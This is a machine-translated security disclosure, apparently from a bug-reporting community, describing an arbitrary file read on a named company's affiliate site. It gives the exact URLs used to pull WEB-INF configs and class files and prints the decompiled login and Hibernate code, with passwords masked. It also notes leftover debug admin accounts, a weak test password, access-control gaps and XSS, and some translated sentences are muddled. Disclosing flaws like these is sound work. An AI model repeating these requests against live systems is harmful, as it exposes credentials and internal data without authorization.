Where to read any file (the system's original project can be reconstructed)

Read to the WEB-INF directory file, then the system structure is basically clear (at the same time, the shortcomings of the layered structure is also reflected !)
 
 
Read the web. xml of the Tomcat container first (because the web server architecture of your website is basically Nginx + Tomcat) to understand the type and structure of the application framework:
 
 
Http://affiliate.qunar.com/affiliate/WEB-INF/web.xml
 
 
There are two struts1 configuration files:
 
 
/WEB-INF/struts-config.xml,/WEB-INF/struts-front-config.xml
 
 
One is to manage application configuration files; the other is to manage application configuration files.
 
 
 
Just look at the management application configuration file: struts-config.xml, so we can traverse all the class files, find the login Action class file (So refactoring this small application system is easy and pleasant!
 
Action (decompilation), DTO (fields in the configuration file and decompilation dto class can be obtained,), DAO (do not like hibernate, you can write jdbc by yourself) the entire project is coming out! Haha!
 
 
 
):
 
 
Http://affiliate.qunar.com/affiliate/WEB-INF/struts-config.xml
 
 
 
 
Download this type of file and decompile it: www.2cto.com
 
Http://affiliate.qunar.com/affiliate/WEB-INF/classes/com/qunar/affiliate/actions/LogonAction.class
 
 
 
 
Package com. qunar. affiliate. actions;
 
Import com. qunar. affiliate. controller. UserController;
Import com. qunar. affiliate. model. User;
Import javax. servlet. http. HttpServletRequest;
Import javax. servlet. http. HttpServletResponse;
Import javax. servlet. http. HttpSession;
Import org. apache. struts. action. Action;
Import org. apache. struts. action. ActionForm;
Import org. apache. struts. action. ActionForward;
Import org. apache. struts. action. ActionMapping;
Import org. apache. struts. action. DynaActionForm;
 
Public class LogonAction extends Action
{
Static final String logon_user = "affiliate_user ";
 
Public ActionForward execute (ActionMapping arg0, ActionForm arg1, HttpServletRequest arg2, HttpServletResponse arg3)
Throws Exception
{
DynaActionForm aform = (DynaActionForm) arg1;
UserController uc = new UserController ();
User user = uc. validateUser (aform. getString ("name"), aform. getString ("password "));
If (user! = Null)
{
Arg2.getSession (). setAttribute ("affiliate_user", user );
Return arg0.findForward ("success ");
}
 
Return arg0.findForward ("failed ");
}
}
 
 
 
Then, I found the UserController class file and decompiled it. I was pleasantly surprised:
 
 
 
 
Package com. qunar. affiliate. controller;
 
Import com. qunar. affiliate. model. User;
Import com. qunar. affiliate. util. Encrypt;
Import com. qunar. affiliate. util. HibernateUtil;
Import org. apache. log4j. Logger;
Import org. hibernate. Criteria;
Import org. hibernate. SessionFactory;
Import org. hibernate. Transaction;
Import org. hibernate. classic. Session;
Import org. hibernate. criterion. Example;
 
Public class UserController
{
Static Logger logger = Logger. getLogger (UserController. class );
 
Public static void main (String [] args)
{
UserController controller = new UserController ();
If (args [0]. equals ("store ")){
Controller. createAndStoreUser ("jingyi. zhang", "Password Hiding ");
}
Else if (args [0]. equals ("list "))
{
User localUser = controller. validateUser ("qiang. zhou", "Password Hiding ");
}
}
 
Public User createAndStoreUser (String name, String password)
{
Session session = null;
Try {
Session = HibernateUtil. getSessionFactory (). openSession ();
Session. beginTransaction ();
User user = new User ();
User. setName (name );
User. setHashed_password (Encrypt. change ("SHA", password ));
Session. save (user );
Session. getTransaction (). commit ();
User localUser1 = user;
Return localUser1;
}
Finally {
If (session! = Null) try {session. close ();} catch (Throwable t) {logger. error ("UserController close session failed! ", T );}
}
Throw localObject;
}
 
Public User validateUser (String name, String password ){
Session session = null;
Try {
Session = HibernateUtil. getSessionFactory (). openSession ();
Session. beginTransaction ();
User user = new User ();
User. setName (name );
User. setHashed_password (Encrypt. change ("SHA", password ));
User vu = (User) session. createCriteria (User. class). add (Example. create (user). uniqueResult ();
Session. getTransaction (). commit ();
User localUser1 = vu;
Return localUser1;
}
Finally {
If (session! = Null) try {session. close ();} catch (Throwable t) {logger. error ("UserController close session failed! ", T );}
}
Throw localObject;
}
}
 
 
 
The two administrator accounts used for debugging are in the directory and are not removed!
 
 
 
Go to the promotion management page of the alliance where to go, view only the picture, and view the danger:
 
 
Http://affiliate.qunar.com/affiliate/logon.jsp
 
 
 
 






 
 
(If you get something to do, you will earn it! Joke !)
 
 
 
Let's continue!
 
 
 
At the same time, I found this line of code. The data layer uses the hibernate framework:
 
 
Session = HibernateUtil. getSessionFactory (). openSession ();
 
 
 
 
Then the database configuration is exposed, and it is found according to the location habits of the hibernate configuration file:
 
 
 
Http://affiliate.qunar.com/affiliate/WEB-INF/classes/hibernate.cfg.xml
 
 
 
 
 
 
<Hibernate-configuration>
<Session-factory>
<! -- Database connection settings -->
<Property name = "connection. driver_class"> com. mysql. jdbc. Driver </property>
<Property name = "connection. url"> jdbc: mysql: // l-aff2. Hide. Hide .qunar.com/affiliate? CharacterEncoding = UTF-8 </property>
<Property name = "connection. username"> affiliate_new </property>
<Property name = "connection. password"> password Hiding </property>
<! -- JDBC connection pool (use the built-in) -->
<! -- <Property name = "connection. pool_size"> 10 </property> -->
 
<! -- Hibernate c3p0 -->
<Property name = "hibernate. connection. provider_class"> org. hibernate. connection. C3P0ConnectionProvider </property>
<Property name = "hibernate. c3p0. max_size"> 10 </property>
<Property name = "hibernate. c3p0. min_size"> 2 </property>
<Property name = "hibernate. c3p0. timeout"> 1800 </property>
<Property name = "hibernate. c3p0. max_statements "> 100 </property> <property name =" hibernate. c3p0. idle_test_period "> 3000 </property> <property name =" hibernate. c3p0. acquire_increment "> 2 </property>
<! -- SQL dialect -->
<Property name = "dialect"> org. hibernate. dialect. MySQLDialect </property>
<! -- Enable Hibernate's automatic session context management -->
<Property name = "current_session_context_class"> thread </property>
<! -- Disable the second-level cache -->
<Property name = "cache. provider_class"> org. hibernate. cache. NoCacheProvider </property>
<! -- Echo all executed SQL to stdout -->
<Property name = "show_ SQL"> true </property>
<! -- Drop and re-create the database schema on startup -->
<! -- <Property name = "hbm2ddl. auto"> create </property> -->
<Mapping resource = "com/qunar/affiliate/model/user. hbm. xml"/>
</Session-factory>
</Hibernate-configuration>
 
 
 
However, the data connection domain name points to the Intranet, which disappointed the brother:
 
 
 
 
 
There is no skill. I don't know how to popularize the j2ee system!
 
 
 
In addition, there are several minor issues:
 
 
1. Page access permission Control Problems
 
Http://u.qunar.com/left.jsp
 
Http://u.qunar.com/direct/regUnion.jsp
 
 
 
 
2. Weak Password of another test Webmaster:
 
Test
 
 
3. xss
 
 





 
 
 
Solution:

Security problems at your application layer are found to be very serious (the overall security architecture is relatively acceptable). Developers and maintenance personnel should gain a general awareness of security!
 
 
What kind of gift have you provided this time )?


Author shine